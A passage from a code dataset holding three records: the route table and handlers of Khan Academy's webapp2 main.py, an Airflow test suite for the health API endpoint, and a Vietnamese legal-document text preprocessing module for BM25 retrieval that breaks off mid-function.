video_playlist = video.first_playlist()\n if video_playlist != None:\n playlists.append(video_playlist)\n filtered_videos.append(video)\n filtered_videos_by_key[str(video.key())] = []\n 
else:\n filtered_videos.append(video)\n filtered_videos_by_key[str(video.key())] = []\n video_count = len(filtered_videos)\n\n # Get the related exercises\n all_exercise_videos = exvids_future[0].get_result()\n exercise_keys = []\n for exvid in all_exercise_videos:\n video_key = str(ExerciseVideo.video.get_value_for_datastore(exvid))\n if video_key in filtered_videos_by_key:\n exercise_key = ExerciseVideo.exercise.get_value_for_datastore(exvid)\n video_exercise_keys = filtered_videos_by_key[video_key]\n video_exercise_keys.append(exercise_key)\n exercise_keys.append(exercise_key)\n exercises = db.get(exercise_keys)\n\n # Sort exercises with videos\n video_exercises = {}\n for video_key, exercise_keys in filtered_videos_by_key.iteritems():\n video_exercises[video_key] = map(lambda exkey: [exercise for exercise in exercises if exercise.key() == exkey][0], exercise_keys)\n\n # Count number of videos in each playlist and sort descending\n for playlist in playlists:\n if len(filtered_videos) > 0:\n playlist.match_count = [(playlist.title in video.playlists) for video in filtered_videos].count(True)\n else:\n playlist.match_count = 0\n playlists = sorted(playlists, key=lambda playlist: -playlist.match_count)\n\n template_values.update({\n 'playlists': playlists,\n 'videos': filtered_videos,\n 'video_exercises': video_exercises,\n 'search_string': query,\n 'video_count': video_count,\n 'playlist_count': playlist_count,\n })\n self.render_jinja2_template(\"searchresults.html\", template_values)\n\nclass RedirectToJobvite(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"http://hire.jobvite.com/CompanyJobs/Careers.aspx?k=JobListing&c=qd69Vfw7\")\n\nclass RedirectToToolkit(request_handler.RequestHandler):\n def get(self):\n self.redirect(\"https://sites.google.com/a/khanacademy.org/schools/\")\n\nclass PermanentRedirectToHome(request_handler.RequestHandler):\n def get(self):\n\n redirect_target = \"/\"\n relative_path = self.request.path.rpartition('/')[2].lower()\n\n # Permanently redirect old JSP version of the site to home\n # or, in the case of some special targets, to their appropriate new URL\n dict_redirects = {\n \"sat.jsp\": \"/sat\",\n \"gmat.jsp\": \"/gmat\",\n }\n\n if dict_redirects.has_key(relative_path):\n redirect_target = dict_redirects[relative_path]\n\n self.redirect(redirect_target, True)\n\nclass ServeUserVideoCss(request_handler.RequestHandler):\n def get(self):\n user_data = UserData.current()\n if user_data == None:\n return\n\n user_video_css = models.UserVideoCss.get_for_user_data(user_data)\n self.response.headers['Content-Type'] = 'text/css'\n\n if user_video_css.version == user_data.uservideocss_version:\n # Don't cache if there's a version mismatch and update isn't finished\n self.response.headers['Cache-Control'] = 'public,max-age=1000000'\n\n self.response.out.write(user_video_css.video_css)\n\nclass RealtimeEntityCount(request_handler.RequestHandler):\n def get(self):\n if not App.is_dev_server:\n raise Exception(\"Only works on dev servers.\")\n default_kinds = 'Exercise'\n kinds = self.request_string(\"kinds\", default_kinds).split(',')\n for kind in kinds:\n count = getattr(models, kind).all().count(10000)\n self.response.out.write(\"%s: %d \" % (kind, count))\n\napplicationSmartHistory = webapp2.WSGIApplication([\n ('/.*', smarthistory.SmartHistoryProxy)\n])\n\napplication = webapp2.WSGIApplication([\n ('/', homepage.ViewHomePage),\n ('/about', util_about.ViewAbout),\n ('/about/blog', blog.ViewBlog),\n ('/about/blog/.*', blog.ViewBlogPost),\n 
('/about/the-team', util_about.ViewAboutTheTeam),\n ('/about/getting-started', util_about.ViewGettingStarted),\n ('/about/tos', ViewTOS ),\n ('/about/api-tos', ViewAPITOS),\n ('/about/privacy-policy', ViewPrivacyPolicy ),\n ('/about/dmca', ViewDMCA ),\n ('/contribute', ViewContribute ),\n ('/contribute/credits', ViewCredits ),\n ('/frequently-asked-questions', util_about.ViewFAQ),\n ('/about/faq', util_about.ViewFAQ),\n ('/downloads', util_about.ViewDownloads),\n ('/about/downloads', util_about.ViewDownloads),\n ('/getinvolved', ViewGetInvolved),\n ('/donate', Donate),\n ('/exercisedashboard', exercises.ViewAllExercises),\n\n # Issues a command to re-generate the library content.\n ('/library_content', library.GenerateLibraryContent),\n\n ('/exercise/(.+)', exercises.ViewExercise), # /exercises/addition_1\n ('/exercises', exercises.ViewExercise), # This old /exercises?exid=addition_1 URL pattern is deprecated\n ('/review', exercises.ViewExercise),\n\n ('/khan-exercises/exercises/.*', exercises.RawExercise),\n ('/viewexercisesonmap', exercises.ViewAllExercises),\n ('/editexercise', exercises.EditExercise),\n ('/updateexercise', exercises.UpdateExercise),\n ('/moveexercisemapnodes', exercises.MoveMapNodes),\n ('/admin94040', exercises.ExerciseAdmin),\n ('/video/(.*)', ViewVideo),\n ('/v/(.*)', ViewVideo),\n ('/video', ViewVideo), # Backwards URL compatibility\n ('/sat', ViewSAT),\n ('/gmat', ViewGMAT),\n ('/reportissue', ReportIssue),\n ('/search', Search),\n ('/savemapcoords', knowledgemap.SaveMapCoords),\n ('/saveexpandedallexercises', knowledgemap.SaveExpandedAllExercises),\n ('/crash', Crash),\n\n ('/image_cache/(.+)', ImageCache),\n\n ('/mobilefullsite', MobileFullSite),\n ('/mobilesite', MobileSite),\n\n ('/admin/reput', bulk_update.handler.UpdateKind),\n ('/admin/retargetfeedback', RetargetFeedback),\n ('/admin/startnewbadgemapreduce', util_badges.StartNewBadgeMapReduce),\n ('/admin/badgestatistics', util_badges.BadgeStatistics),\n ('/admin/startnewexercisestatisticsmapreduce', exercise_statistics.StartNewExerciseStatisticsMapReduce),\n ('/admin/startnewvotemapreduce', voting.StartNewVoteMapReduce),\n ('/admin/feedbackflagupdate', qa.StartNewFlagUpdateMapReduce),\n ('/admin/dailyactivitylog', activity_summary.StartNewDailyActivityLogMapReduce),\n ('/admin/youtubesync.*', youtube_sync.YouTubeSync),\n ('/admin/changeemail', ChangeEmail),\n ('/admin/realtimeentitycount', RealtimeEntityCount),\n\n ('/devadmin/emailchange', devpanel.Email),\n ('/devadmin/managedevs', devpanel.Manage),\n ('/devadmin/managecoworkers', devpanel.ManageCoworkers),\n ('/devadmin/commoncore', devpanel.CommonCore),\n\n ('/coaches', coaches.ViewCoaches),\n ('/students', coaches.ViewStudents),\n ('/registercoach', coaches.RegisterCoach),\n ('/unregistercoach', coaches.UnregisterCoach),\n ('/unregisterstudent', coaches.UnregisterStudent),\n ('/requeststudent', coaches.RequestStudent),\n ('/acceptcoach', coaches.AcceptCoach),\n\n ('/createstudentlist', coaches.CreateStudentList),\n ('/deletestudentlist', coaches.DeleteStudentList),\n ('/removestudentfromlist', coaches.RemoveStudentFromList),\n ('/addstudenttolist', coaches.AddStudentToList),\n\n ('/individualreport', coaches.ViewIndividualReport),\n ('/progresschart', coaches.ViewProgressChart),\n ('/sharedpoints', coaches.ViewSharedPoints),\n ('/classreport', coaches.ViewClassReport),\n ('/classtime', coaches.ViewClassTime),\n ('/charts', coaches.ViewCharts),\n\n ('/mailing-lists/subscribe', util_mailing_lists.Subscribe),\n\n ('/profile/graph/activity', 
util_profile.ActivityGraph),\n ('/profile/graph/focus', util_profile.FocusGraph),\n ('/profile/graph/exercisesovertime', util_profile.ExercisesOverTimeGraph),\n ('/profile/graph/exerciseproblems', util_profile.ExerciseProblemsGraph),\n ('/profile/graph/exerciseprogress', util_profile.ExerciseProgressGraph),\n ('/profile', util_profile.ViewProfile),\n\n ('/profile/graph/classexercisesovertime', util_profile.ClassExercisesOverTimeGraph),\n ('/profile/graph/classenergypointsperminute', util_profile.ClassEnergyPointsPerMinuteGraph),\n ('/profile/graph/classtime', util_profile.ClassTimeGraph),\n ('/class_profile', util_profile.ViewClassProfile),\n\n ('/login', Login),\n ('/login/mobileoauth', MobileOAuthLogin),\n ('/postlogin', PostLogin),\n ('/logout', Logout),\n\n ('/api-apps/register', oauth_apps.Register),\n\n # These are dangerous, should be able to clean things manually from the remote python shell\n\n ('/deletevideoplaylists', DeleteVideoPlaylists),\n ('/killliveassociations', KillLiveAssociations),\n\n # Below are all discussion related pages\n ('/discussion/addcomment', comments.AddComment),\n ('/discussion/pagecomments', comments.PageComments),\n\n ('/discussion/addquestion', qa.AddQuestion),\n ('/discussion/expandquestion', qa.ExpandQuestion),\n ('/discussion/addanswer', qa.AddAnswer),\n ('/discussion/editentity', qa.EditEntity),\n ('/discussion/answers', qa.Answers),\n ('/discussion/pagequestions', qa.PageQuestions),\n ('/discussion/clearflags', qa.ClearFlags),\n ('/discussion/flagentity', qa.FlagEntity),\n ('/discussion/voteentity', voting.VoteEntity),\n ('/discussion/updateqasort', voting.UpdateQASort),\n ('/admin/discussion/finishvoteentity', voting.FinishVoteEntity),\n ('/discussion/deleteentity', qa.DeleteEntity),\n ('/discussion/changeentitytype', qa.ChangeEntityType),\n ('/discussion/videofeedbacknotificationlist', notification.VideoFeedbackNotificationList),\n ('/discussion/videofeedbacknotificationfeed', notification.VideoFeedbackNotificationFeed),\n ('/discussion/moderatorlist', qa.ModeratorList),\n ('/discussion/flaggedfeedback', qa.FlaggedFeedback),\n\n ('/githubpost', github.NewPost),\n ('/githubcomment', github.NewComment),\n\n ('/toolkit', RedirectToToolkit),\n\n ('/paypal/ipn', paypal.IPN),\n\n ('/badges/view', util_badges.ViewBadges),\n ('/badges/custom/create', custom_badges.CreateCustomBadge),\n ('/badges/custom/award', custom_badges.AwardCustomBadge),\n\n ('/notifierclose', util_notify.ToggleNotify),\n ('/newaccount', Clone),\n\n ('/jobs', RedirectToJobvite),\n ('/jobs/.*', RedirectToJobvite),\n\n ('/dashboard', dashboard.Dashboard),\n ('/contentdash', dashboard.ContentDashboard),\n ('/admin/dashboard/record_statistics', dashboard.RecordStatistics),\n ('/admin/entitycounts', dashboard.EntityCounts),\n\n ('/sendtolog', SendToLog),\n\n ('/user_video_css', ServeUserVideoCss),\n\n ('/admin/exercisestats/collectfancyexercisestatistics', exercisestats.CollectFancyExerciseStatistics),\n ('/exercisestats/report', exercisestats.report.Test),\n ('/exercisestats/exerciseovertime', exercisestats.report_json.ExerciseOverTimeGraph),\n ('/exercisestats/geckoboardexerciseredirect', exercisestats.report_json.GeckoboardExerciseRedirect),\n ('/exercisestats/exercisestatsmap', exercisestats.report_json.ExerciseStatsMapGraph),\n ('/exercisestats/exerciseslastauthorcounter', exercisestats.report_json.ExercisesLastAuthorCounter),\n ('/exercisestats/exercisenumbertrivia', exercisestats.report_json.ExerciseNumberTrivia),\n ('/exercisestats/userlocationsmap', 
exercisestats.report_json.UserLocationsMap),\n ('/exercisestats/exercisescreatedhistogram', exercisestats.report_json.ExercisesCreatedHistogram),\n\n ('/goals/new', goals.handlers.CreateNewGoal),\n ('/goals/admincreaterandom', goals.handlers.CreateRandomGoalData),\n\n ('/robots.txt', robots.RobotsTxt),\n\n ('/r/.*', redirects.Redirect),\n ('/redirects', redirects.List),\n ('/redirects/add', redirects.Add),\n ('/redirects/remove', redirects.Remove),\n\n # Redirect any links to old JSP version\n ('/.*\\.jsp', PermanentRedirectToHome),\n ('/index\\contribute', PermanentRedirectToHome),\n\n ('/_ah/warmup.*', warmup.Warmup),\n\n # -- KHAN-NL -----------------------------------\n ('/nl-content/.*', nl.Content),\n ('/nl_report', nl_report.BugReporter),\n\t('/helpmee', nl.LinkerHelpmee),\n\n ], debug=True)\n\napplication = profiler.ProfilerWSGIMiddleware(application)\napplication = GAEBingoWSGIMiddleware(application)\napplication = request_cache.RequestCacheMiddleware(application)\n\ndef main():\n if os.environ[\"SERVER_NAME\"] == \"smarthistory.khanacademy.org\":\n run_wsgi_app(applicationSmartHistory)\n else:\n run_wsgi_app(application)\n\nif __name__ == '__main__':\n main()\n","repo_name":"KhanWorld/KhanAcademy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":37707,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"}
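The Khan Academy record above builds one large webapp2.WSGIApplication from a route table and then wraps it in successive WSGI middlewares (profiler, GAE/Bingo, request cache). The same pattern in miniature; the handler and logging middleware here are illustrative stand-ins, not KA code:

import webapp2

class HelloHandler(webapp2.RequestHandler):
    def get(self):
        self.response.write("hello")

def logging_middleware(app):
    # a WSGI middleware is just a callable that wraps another WSGI app
    def wrapped(environ, start_response):
        print("request:", environ.get("PATH_INFO"))
        return app(environ, start_response)
    return wrapped

application = webapp2.WSGIApplication([("/hello", HelloHandler)], debug=True)
application = logging_middleware(application)  # layered like the profiler/bingo/cache wrappers above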
+{"seq_id":"32682330613","text":"from __future__ import annotations\n\nfrom datetime import timedelta\nfrom unittest import mock\n\nimport pytest\n\nfrom airflow.jobs.job import Job\nfrom airflow.jobs.scheduler_job_runner import SchedulerJobRunner\nfrom airflow.utils import timezone\nfrom airflow.utils.session import create_session, provide_session\nfrom airflow.utils.state import State\n\nHEALTHY = \"healthy\"\nUNHEALTHY = \"unhealthy\"\n\n\nclass TestHealthTestBase:\n @pytest.fixture(autouse=True)\n def setup_attrs(self, minimal_app_for_api) -> None:\n self.app = minimal_app_for_api\n self.client = self.app.test_client() # type:ignore\n with create_session() as session:\n session.query(Job).delete()\n\n def teardown_method(self):\n with create_session() as session:\n session.query(Job).delete()\n\n\nclass TestGetHealth(TestHealthTestBase):\n @provide_session\n def test_healthy_scheduler_status(self, session):\n last_scheduler_heartbeat_for_testing_1 = timezone.utcnow()\n job = Job(state=State.RUNNING, latest_heartbeat=last_scheduler_heartbeat_for_testing_1)\n SchedulerJobRunner(job=job)\n session.add(job)\n session.commit()\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"healthy\" == resp_json[\"scheduler\"][\"status\"]\n assert (\n last_scheduler_heartbeat_for_testing_1.isoformat()\n == resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"]\n )\n\n @provide_session\n def test_unhealthy_scheduler_is_slow(self, session):\n last_scheduler_heartbeat_for_testing_2 = timezone.utcnow() - timedelta(minutes=1)\n job = Job(state=State.RUNNING, latest_heartbeat=last_scheduler_heartbeat_for_testing_2)\n SchedulerJobRunner(job=job)\n session.add(job)\n session.commit()\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"unhealthy\" == resp_json[\"scheduler\"][\"status\"]\n assert (\n last_scheduler_heartbeat_for_testing_2.isoformat()\n == resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"]\n )\n\n def test_unhealthy_scheduler_no_job(self):\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"unhealthy\" == resp_json[\"scheduler\"][\"status\"]\n assert resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"] is None\n\n @mock.patch.object(SchedulerJobRunner, \"most_recent_job\")\n def test_unhealthy_metadatabase_status(self, most_recent_job_mock):\n most_recent_job_mock.side_effect = Exception\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"unhealthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"] is None\n","repo_name":"a0x8o/airflow","sub_path":"tests/api_connexion/endpoints/test_health_endpoint.py","file_name":"test_health_endpoint.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"73030843939","text":"import re\nimport math\nimport json\nimport pandas as pd\nimport string \n\n# common phrases in legal documents\nre_thuchientheo = re.compile(\n r\"((((được\\s)?thực hiện theo qu[iy] định tại\\s|hướng dẫn tại\\s|theo qu[iy] định tại\\s|(được\\s)?thực hiện theo\\s|theo qu[iy] định tại\\s|theo nội dung qu[yi] định tại\\s|quy[iy] định tại|theo\\s)(các\\s)?)?|tại\\s(các\\s)?)(khoản(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điều(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điểm\\s(([a-z]|đ)\\,\\s)*([a-z]|đ)\\b|chương(\\ssố)?\\s(\\d+\\,\\s)*\\d+)((\\s|\\,\\s|\\s\\,\\s|\\svà\\s)(khoản(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điều(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điểm\\s(([a-z]|đ)\\,\\s)*([a-z]|đ)\\b|chương(\\ssố)?\\s(\\d+\\,\\s)*\\d+))*(\\s(điều này|thông tư này|nghị quyết này|quyết định này|nghị định này|văn bản này|quyết định này))?\"\n)\nre_thongtuso = re.compile(\n r\"(thông tư liên tịch|thông tư|nghị quyết|quyết định|nghị định|văn bản|Thông tư liên tịch|Thông tư|Nghị quyết|Nghị định|Văn bản|Quyết định)\\s(số\\s)?(([a-z0-9]|đ|\\-)+\\/([a-z0-9]|đ|\\-|\\/)*)\"\n)\nre_ngay = re.compile(r\"ngày\\s\\d+\\/\\d+\\/\\d+\\b|ngày\\s\\d+tháng\\d+năm\\d+\")\nre_thang_nam = re.compile(r\"tháng\\s\\d+\\/\\d+|tháng\\s\\d+|năm\\s\\d+\")\nre_chuong = re.compile(\n r\"chương\\s(III|II|IV|IX|VIII|VII|VI|XIII|XII|XI|XIV|XIX|XVIII|XVII|XVI|XV|XX|V|X|I|XXIII|XXII|XXI|XXIV|XXVIII|XXVII|XXVI|XXV|XXIX|XXX)\\b\"\n)\n\n# common end phrases in questions\nEND_PHRASES = [\n \"có đúng không\",\n \"đúng không\",\n \"được không\",\n \"hay không\",\n \"được hiểu thế nào\",\n \"được quy định cụ thể là gì\",\n \"được quy định như thế nào\",\n \"được quy định thế nào\",\n \"được quy định như nào\",\n \"trong trường hợp như nào\",\n \"trong trường hợp như thế nào\",\n \"trong trường hợp nào\",\n \"trong những trường hợp nào\",\n \"được hiểu như thế nào\",\n \"được hiểu như nào\",\n \"như thế nào\",\n \"thế nào\",\n \"như nào\",\n \"là gì\",\n \"là ai\",\n \"là bao nhiêu\",\n \"bao nhiêu\",\n \"trước bao lâu\",\n \"là bao lâu\",\n \"bao lâu\",\n \"bao gồm gì\",\n \"không\",\n \"bao gồm những gì\",\n \"vào thời điểm nào\",\n \"gồm những giấy tờ gì\",\n \"những yêu cầu nào\",\n]\n\n# punctuations, characters, stop-words \npunc = \"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^`{|}~\"\"\" # noqa: W605\ntable = str.maketrans(\"\", \"\", punc)\n\npunctuation = [x for x in string.punctuation]\nnumber = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\"]\nchars = [\"a\", \"b\", \"c\", \"d\", \"đ\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\"]\nstop_word = number + chars + [\"của\", \"và\", \"các\", \"có\", \"được\", \"theo\", \"tại\", \"trong\", \"về\", \n \"hoặc\", \"người\", \"này\", \"khoản\", \"cho\", \"không\", \"từ\", \"phải\", \n \"ngày\", \"việc\", \"sau\", \"để\", \"đến\", \"bộ\", \"với\", \"là\", \"năm\", \n \"khi\", \"số\", \"trên\", \"khác\", \"đã\", \"thì\", \"thuộc\", \"điểm\", \"đồng\",\n \"do\", \"một\", \"bị\", \"vào\", \"lại\", \"ở\", \"nếu\", \"làm\", \"đây\", \n \"như\", \"đó\", \"mà\", \"nơi\", \"”\", \"“\"]\nbm25_removed = punctuation + stop_word\n\n# defining sub-functions\n\ndef remove_dieu_number(text):\n '''\n This funtion removes the common legal phrases out from texts\n '''\n text = re_thuchientheo.sub(\" \", text)\n text = re_thongtuso.sub(\" \", text)\n text = re_ngay.sub(\" \", text)\n text = re_thang_nam.sub(\" \", text)\n text = re_chuong.sub(\" \", text)\n return \" \".join(text.split())\n\n\ndef remove_other_number_by_zero(text):\n '''\n This funtion replaces numeric characters in 
texts into 0 for easier handling\n '''\n for digit in [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n text = text.replace(digit, \"0\")\n return text\n\n\ndef remove_punct(text):\n '''\n This funtion replaces punctuations in texts for easier handling\n '''\n text = text.replace(\";\", \",\").replace(\":\", \".\").replace(\"“\", \" \").replace(\"”\", \" \")\n text = \"\".join(\n [\n c\n if c.isalpha() or c.isdigit() or c in [\" \", \",\", \"(\", \")\", \".\", \"/\", \"-\"]\n else \" \"\n for c in text\n ]\n )\n text = \" \".join(text.split())\n return text\n\ndef lower_or_keep(text):\n \"This funtion lower words but not for abbreviations\"\n lst = text.split(\" \")\n newlst = [x if x.isupper() else x.lower() for x in lst]\n return \" \".join(newlst)\n\ndef preprocess_all_title(article_title):\n \"\"\"\n Preprocess titles of documents\n \"\"\"\n article_title = lower_or_keep(article_title)\n lst = article_title.split()\n new_lst = []\n for i in range(len(lst)):\n if lst[i] == 'số' and i == len(lst)-1:\n new_lst.append(lst[i])\n elif lst[i] == 'số' and \"/\" in lst[i+1]:\n pass\n elif \"/\" in lst[i]:\n pass\n else:\n new_lst.append(lst[i])\n article_title = \" \".join(new_lst)\n article_title = remove_dieu_number(article_title)\n #article_title = remove_other_number_by_zero(article_title)\n article_title = remove_punct(article_title)\n article_title = article_title.replace(\"về\", \"\")\n if \"do\" in article_title and \"ban hành\" in article_title:\n idx = article_title.rfind(\"do\")\n article_title = article_title[:(idx-1)]\n \n re_head = re.compile(r\"(thông tư liên tịch|thông tư|nghị quyết|quyết định|nghị định|văn bản)\\s(quy định|hướng dẫn)?\")\n article_title = re_head.sub(\" \", article_title)\n article_title = article_title.replace(\" \", \" \")\n article_title = article_title.replace(\" \", \" \")\n return article_title.strip()\n\ndef preprocess_article_title(article_title):\n \"\"\"\n Preprocess titles of documents\n \"\"\"\n article_title = lower_or_keep(article_title)\n article_title = \" \".join(article_title.split()[2:]) # Dieu 1.\n article_title = remove_dieu_number(article_title)\n #article_title = remove_other_number_by_zero(article_title)\n article_title = remove_punct(article_title)\n return article_title\n \ndef preprocess_khoan(khoan):\n \"\"\"\n Perprocess parts in a legal documents\n \"\"\"\n khoan = lower_or_keep(khoan)\n khoan = khoan.replace(\"\\xa0\", \"\")\n matched = re.match(r\"^\\d+\\.(\\d+\\.?)?\\s\", khoan) # 1. 2.2. 2.2\n if matched is not None:\n khoan = khoan[matched.span()[1]:].strip()\n\n else:\n matched2 = re.match(r\"^[\\wđ]\\)\\s\", khoan)\n if matched2 is not None:\n khoan = khoan[matched2.span()[1]:].strip()\n\n khoan = remove_dieu_number(khoan)\n #khoan = khoan.replace(\"đ)\",\"\")\n khoan = re.sub(r\"[\\wđ]\\) \",\"\", khoan)\n khoan = re.sub(r\"[\\wđ]\\. \",\"\", khoan)\n khoan = re.sub(r\"\\d+\\.\\d+\\.\\d+\\. \", \"\", khoan)\n khoan = re.sub(r\"\\d+\\.\\d+\\. \", \"\", khoan)\n khoan = re.sub(r\"\\d+\\. \", \"\", khoan)\n #khoan = re.sub(r\"[0-9]\\. \", \"\", khoan)\n #khoan = remove_other_number_by_zero(khoan)\n khoan = remove_punct(khoan)\n khoan = khoan.replace(\". 
.\", \".\")\n khoan = khoan.replace(\"..\", \".\")\n khoan = khoan.replace(\", ,\", \",\")\n khoan = khoan.replace(\",,\", \",\")\n khoan = khoan.strip()\n return \" \".join(khoan.split())\n\n\ndef preprocess_question(q, remove_end_phrase=True):\n \"\"\"\n Preprocess questions\n \"\"\"\n q = lower_or_keep(q)\n q = remove_dieu_number(q)\n q = \"\".join([c if c.isalpha() or c.isdigit() or c == \" \" else \" \" for c in q])\n q = remove_punct(q)\n if remove_end_phrase:\n for phrase in END_PHRASES:\n if q.endswith(phrase):\n q = q[: -len(phrase)]\n break\n\n return q.strip()\n\n'''def tokenise(text, segmenter):\n \"\"\"\n Segment the texts with vncorenlp-segemnter\n \"\"\"\n result = segmenter.tokenize(text)\n rlt = \"\"\n for i in range(len(result)-1):\n rlt += \" \".join(result[i])\n rlt += \" \"\n rlt += \" \".join(result[len(result)-1])\n return rlt\n'''\ndef tokenise(text, f):\n \"\"\"\n Segment the texts with pyvi tokenizer\n \"\"\"\n return f(text)\n \ndef remove_stopword(w):\n \"Remove stopwords in texts\"\n return w not in stop_word\n\ndef bm25_process(text, f):\n \"\"\"\n Processing texts for bm25: remove all puntuations, lower all words\n \"\"\"\n text = tokenise(text, f)\n words = text.lower().split(\" \")\n result = [w for w in words if w not in bm25_removed]\n stripped = \" \".join(result)\n result = \" \".join(stripped.split(\" \"))\n return result\n\ndef length(sentence):\n \"Return the length in words of sentences\"\n return len(sentence.split())\n\ndef build_corpus(f, corpus_file, law_dict, scorpus_ids, head = False):\n \"\"\"\n Build a corpus-dataframe\n \"\"\"\n law_ids = []\n text_ids = []\n article_ids = []\n titles = []\n texts = []\n processed_texts = []\n tokenized_texts = []\n bm25texts = []\n lengths = []\n ids = []\n sub_ids = []\n count = 0\n\n with open (corpus_file, 'r') as input:\n data = json.load(input)\n \n for law in data:\n for article in law['articles']:\n ids.append(count)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_id = law['law_id'] + \"_\" + article['article_id']\n text_ids.append(text_id)\n \n titles.append(article['title'])\n texts.append(article['text'])\n \n title = preprocess_article_title(article[\"title\"])\n head = preprocess_all_title(law_dict[law['law_id']])\n \n cac_khoan = article[\"text\"].split(\"\\n\")\n khoan_clean = []\n for khoan in cac_khoan:\n khoan = preprocess_khoan(khoan)\n khoan_clean.append(khoan.strip())\n article_text = \" \".join(khoan_clean)\n if head:\n processed_text = head + \". \" + title + \". \" + article_text\n else:\n processed_text = title + \". \" + article_text + \". 
\" + head + \".\"\n processed_texts.append(processed_text)\n start_sub_id = scorpus_ids.index(count)\n try:\n end_sub_id = scorpus_ids.index(count+1)\n sub_ids.append([i for i in range(start_sub_id, end_sub_id)])\n except:\n sub_ids.append([i for i in range(start_sub_id, len(scorpus_ids))])\n \n try: \n tokenized_text = tokenise(processed_text, f)\n tokenized_texts.append(tokenized_text)\n lengths.append(length(tokenized_text))\n except:\n tokenized_text = tokenise(processed_text[:50000], f)\n tokenized_texts.append(tokenized_text)\n lengths.append(length(tokenized_text))\n bm25texts.append(bm25_process(processed_text, f))\n count += 1\n \n df = pd.DataFrame()\n df[\"id\"] = ids\n df[\"law_id\"] = law_ids\n df[\"article_id\"] = article_ids\n df[\"text_id\"] = text_ids\n df[\"title\"] = titles\n df[\"text\"] = texts\n df[\"processed_text\"] = processed_texts\n df[\"sub_id\"] = sub_ids\n df[\"tokenized_text\"] = tokenized_texts\n df[\"bm25text\"] = bm25texts\n df[\"len\"] = lengths\n \n return df\n\ndef create_sliding_window(tokenized_text, size=200, overlap=64):\n \"\"\"\n Create list of windows for a text\n \"\"\"\n sentences = tokenized_text.split(\".\")\n words = tokenized_text.split(\" \")\n title = sentences[0]\n words = [w for w in words if len(w) >0]\n actual_size = size - overlap\n \n windows = []\n n_windows = math.ceil(len(words)/actual_size)\n for i in range(n_windows):\n windows.append(\" \".join(words[i*actual_size:i*actual_size + size]))\n for i in range(1, n_windows):\n if not windows[i].startswith(\".\"):\n windows[i] = title + \". \" + windows[i]\n else:\n windows[i] = title + windows[i]\n return windows\n\ndef build_short_corpus(f, corpus_file, law_dict, head=False, size=200, overlap=64):\n \"\"\"\n Build a corpus-dataframe\n \"\"\"\n ids = []\n law_ids = []\n text_ids = []\n article_ids = []\n titles = []\n texts = []\n processed_texts = []\n sub_ids = []\n tokenized_texts = []\n bm25texts = []\n lengths = []\n\n with open (corpus_file, 'r') as input:\n data = json.load(input)\n idx = 0\n sub_idx = 0\n for law in data:\n for article in law['articles']:\n text_id = law['law_id'] + \"_\" + article['article_id']\n title = preprocess_article_title(article[\"title\"])\n head = preprocess_all_title(law_dict[law['law_id']])\n cac_khoan = article[\"text\"].split(\"\\n\")\n khoan_clean = []\n for khoan in cac_khoan:\n khoan = preprocess_khoan(khoan)\n khoan_clean.append(khoan.strip())\n article_text = \" \".join(khoan_clean)\n if head:\n processed_text = head + \". \" + title + \". \" + article_text\n else:\n processed_text = title + \". \" + article_text + \". 
\" + head + \".\"\n try: \n tokenized_text = tokenise(processed_text, f)\n tokenized_len = length(tokenized_text)\n if tokenized_len <= size + 10:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(tokenized_text)\n lengths.append(tokenized_len)\n bm25texts.append(bm25_process(processed_text, f))\n sub_idx +=1\n else:\n windows = create_sliding_window(tokenized_text, size=224, overlap=64)\n for window in windows:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(window)\n lengths.append(length(window))\n bm25texts.append(bm25_process(window, f)) \n sub_idx +=1\n except:\n actual_size = 50000 - overlap\n big_windows = []\n n_big_windows = math.ceil(len(processed_text)/actual_size)\n for i in range(n_big_windows):\n big_windows.append(\"\".join(processed_text[i*actual_size:i*actual_size + size]))\n for big_window in big_windows:\n tokenized_text = tokenise(big_window, f)\n tokenized_len = length(tokenized_text)\n if tokenized_len > size + 10:\n windows = create_sliding_window(tokenized_text, size=224, overlap=64)\n for window in windows:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(window)\n lengths.append(length(window))\n bm25texts.append(bm25_process(window, f)) \n sub_idx +=1\n else:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n 